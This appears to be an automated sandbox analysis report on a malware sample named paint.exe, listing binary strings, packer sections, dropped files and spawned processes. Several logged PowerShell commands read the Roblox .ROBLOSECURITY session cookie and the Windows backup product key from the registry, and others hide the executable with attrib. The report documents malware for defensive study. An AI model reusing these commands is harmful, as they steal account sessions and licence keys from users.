-D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: paint.exe, 00000001.00000002.2013861786.00007FFDFAED2000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdb source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: paint.exe, 00000001.00000002.2017457879.00007FFE11511000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: paint.exe, 00000001.00000002.2019931710.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: paint.exe, 00000001.00000002.2017803927.00007FFE11EA1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: paint.exe, 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000058.00000000.1922631309.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: paint.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: paint.exe, 00000001.00000002.2019092977.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: paint.exe, 00000001.00000002.2018365437.00007FFE11EC1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
              Source: paint.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: paint.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: paint.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: paint.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: paint.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB029060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB029060
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA09327 push rsp; ret 1_2_00007FFDFAA09328
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA082D8 push rdi; iretd 1_2_00007FFDFAA082DA
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA08419 push r10; retf 1_2_00007FFDFAA08485
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05C31 push r10; ret 1_2_00007FFDFAA05C33
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA0808B push r12; iretd 1_2_00007FFDFAA0809F
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05F01 push r12; ret 1_2_00007FFDFAA05F10
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA08F42 push rsp; iretq 1_2_00007FFDFAA08F43
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05F56 push r12; ret 1_2_00007FFDFAA05F73
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA07689 push r12; ret 1_2_00007FFDFAA076CD
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05E67 push rdi; iretd 1_2_00007FFDFAA05E69
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05EB4 push rsp; iretd 1_2_00007FFDFAA05EB5
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA07FFF push r12; ret 1_2_00007FFDFAA0804A
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA06859 push rsi; ret 1_2_00007FFDFAA06890
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA07F67 push rbp; iretq 1_2_00007FFDFAA07F68
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05F7B push r8; ret 1_2_00007FFDFAA05F83
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05FB9 push r10; ret 1_2_00007FFDFAA05FCC
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05D06 push r12; ret 1_2_00007FFDFAA05D08
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05CE5 push r8; ret 1_2_00007FFDFAA05CEB
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05CE0 push r10; retf 1_2_00007FFDFAA05CE2
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05CED push rdx; ret 1_2_00007FFDFAA05CF7
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05E18 push rsp; ret 1_2_00007FFDFAA05E1C
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA05DF7 push r10; retf 1_2_00007FFDFAA05DFA
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA0763E push rbp; retf 1_2_00007FFDFAA07657
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA08DBF push rsp; retf 1_2_00007FFDFAA08DC0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFE00784331 push rcx; ret 1_2_00007FFE00784332
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9922D2A5 pushad ; iretd 12_2_00007FFD9922D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD99348607 push ebx; ret 12_2_00007FFD9934860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD993484CB push ebx; ret 12_2_00007FFD993484CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9934852B push ebx; ret 12_2_00007FFD9934852A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD993484FA push ebx; ret 12_2_00007FFD9934852A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9934841D push ebx; ret 12_2_00007FFD993484CA
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\paint.exeProcess created: "C:\Users\user\Desktop\paint.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
